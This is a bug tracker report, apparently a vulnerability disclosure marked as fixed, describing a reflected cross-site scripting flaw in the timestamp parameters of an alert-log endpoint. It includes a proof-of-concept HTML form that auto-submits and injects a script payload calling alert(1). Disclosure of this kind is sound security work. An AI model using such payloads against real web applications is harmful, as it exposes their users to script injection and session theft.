Details
-
Bug
-
Resolution: Fixed
-
Major
-
Community Edition
-
None
Description
Hello,
Parameters "timestamp_from" and "timestamp_to" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.
Proof Of Concept Code:
<form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">
|
<input name="timestamp_from" value="'"--></style></scRipt><scRipt>alert(1)</scRipt>"/>
|
<input name="timestamp_to" value=""/>
|
<input name="device_id%5b%5d" value="3"/>
|
<input name="alert_test_id%5b%5d" value="3"/>
|
<input name="log_type%5b%5d" value="ALERT_NOTIFY"/>
|
</form>
|
<script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
|
Regards
Himanshu